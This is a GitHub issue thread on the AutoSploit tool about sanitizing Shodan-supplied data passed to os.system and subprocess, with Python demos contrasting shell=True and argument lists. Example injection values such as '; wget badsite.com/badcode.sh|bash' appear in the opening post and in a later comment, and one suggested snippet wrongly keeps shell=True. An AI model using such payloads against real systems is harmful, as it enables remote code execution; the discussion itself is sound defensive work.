### ISSUE TITLE
Security issue with os.system call

### ISSUE THREAD

**Issue by nma-io** [NullArray/AutoSploit#8]
The os.system call does not properly sanitize input collected from Shodan. 

Its likely SHODAN isn't going to do something bad, but in the unlikely event the API is compromised or someone wants to cause harm, the os.system calls should be properly sanitized or passed to subprocess.Popen without shell=true.  Example:    ip=; wget badsite.com/badcode.sh|bash;

**Comment by NullArray** [comment]
Since i already have a function in the main python file (The cmdline function on line 69 IIRC) that uses subprocess.Popen wouldn't it be possible to just set Shell to False and pass the commands to that function instead of os.system?

**Comment by nma-io** [comment]
Definately, as long as the subprocess call is not passed with shell=true. you could do something like

`    process = Popen(
        args=[command.split(" ")],  # This will build an array out of the arguments
        stdout=PIPE,
        shell=True
    )
    return process.communicate()[0]`

However, for security reasons, this breaks redirects, pipes and chains, so `| grep` wont work, the search of the output will need to be performed by the application.

**Comment by NullArray** [comment]
Ah, thank you for the insight. I will keep this issue open for now and come back to it when i start work on the new version that will incorporate a number of improvements. Thanks!

**Comment by NullArray** [comment]
Hey @nma-io i've I'll have more time after the weekend so but i started to work on a solution based on your suggestion, while i do that i will also add the option to load in a custom host list, and make sure the Pull Request you submitted doesn't have any conflicts with the original. i'll keep you posted.

**Comment by Ekultek** [comment]
Using Popen does not prevent command injection.

**Comment by Ekultek** [comment]
@nma-io 

`Popen` vs `call`?

**Comment by nma-io** [comment]
popen prevents command injection, when 'shell=True' is not set. See the example(s) below:

Properly handled a noted in comment 3. 
```
Python 3.6.4 (default, Dec 25 2017, 14:57:56)
[GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.39.2)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import subprocess
>>> subprocess.Popen(['echo', ';', 'ls'], stdout=subprocess.PIPE).communicate()[0]
b'; ls\n'
>>>
>>> subprocess.Popen(['echo', '`', 'ls', '`'], stdout=subprocess.PIPE).communicate()[0]
b'` ls `\n'
```

Improperly handled with Shell=True:
```
subprocess.Popen(['echo ; ls'], shell=True, stdout=subprocess.PIPE).communicate()[0]
b'\nApplications\nDesktop\nDocuments\nDownloads\nLibrary\nPictures'
```

**Comment by Ekultek** [comment]
No it doesn't:

```
import subprocess


def test():
    return subprocess.Popen(['echo', ';', 'ls'], stdout=subprocess.PIPE).communicate()[0]


if __name__ == "__main__":
    test()
```

```
root@baal-Aspire-5733Z:~/bin/python/autosploit# python poptest.py;ls -a
.   api.p          CONTRIBUTING.md  etc   .gitignore  lib      poptest.py  requirements.txt
..  autosploit.py  Docker           .git  .idea       LICENSE  README.md
root@baal-Aspire-5733Z:~/bin/python/autosploit# 
```

Command injected successfully.

My question is not about the command injection problem, it's about why use Popen over call?

**Comment by nma-io** [comment]
The use of Popen over call is because the subprocess.call function does not return the output of the command run. If the output is no longer needed then call would be just fine and would save some redirect pipes. 

That said, the call functionality suffers from the same issue if one were to utilize shell=True 

I think there may be a misunderstanding of what I was protecting against. We're most interested in protecting against untrusted responses from Shodan (or anyone who MITM's it) that may allow an individual to return data that is expected to be an IP address, hostname, etc, but really returns a command such as '; rm '... The result isn't the same as calling the example code you provided with the chain. 

In your example, its not that you injected anything, but rather you chained a second command after your poptest.py script ran. That is is expected behavior because the user typing those commands (or cutting/pasting) is 'trusting' the input to the kernel. Since that chain happens outside of the python script its really not part of the issue. 

I took your example code and just expanded it a bit to illustrate what i'm trying to say:
```
import time
import subprocess


def test_safe(ip):
    return subprocess.Popen(['echo', ip], stdout=subprocess.PIPE).communicate()[0]


def test_unsafe(ip):
    return subprocess.Popen(['echo' + ip], shell=True, stdout=subprocess.PIPE).communicate()[0]

if __name__ == "__main__":
    fake_shodan_ip = '; banner test'
    print("This is a test showing proper safe handling for variables passed to Subprocess.")
    print(test_safe(fake_shodan_ip))
    print("Pausing for dramatic effect...")
    time.sleep(3)
    print("This is the result of unsafe handling for variables passed to Subprocess.")
    print(test_unsafe(fake_shodan_ip))

```

Basically the first time it will simply print out "; banner test"  -- but after the pause it will use the linux banner utility to print the word Test in ascii.  This could easily be replaced with something like "; wget http://www.badsite.com/malware.sh |bash"  -- if it were properly handled, that bad code would do nothing, ...if not, no matter if you use call or popen - its gonna be a bad day. 

I hope this helps, but there is more information here in case I am not properly describing the issue:
External source:  https://docs.python.org/2/library/subprocess.html Section 17.1.1

**Comment by Ekultek** [comment]
@nma-io, oh I know I’ve read all about it. It’s just people have different opinions on the command injection issue and I wanted to hear yours.

So Popen creates a pipe we can communicate with if I’m correct?

**Comment by Ekultek** [comment]
referencing #55
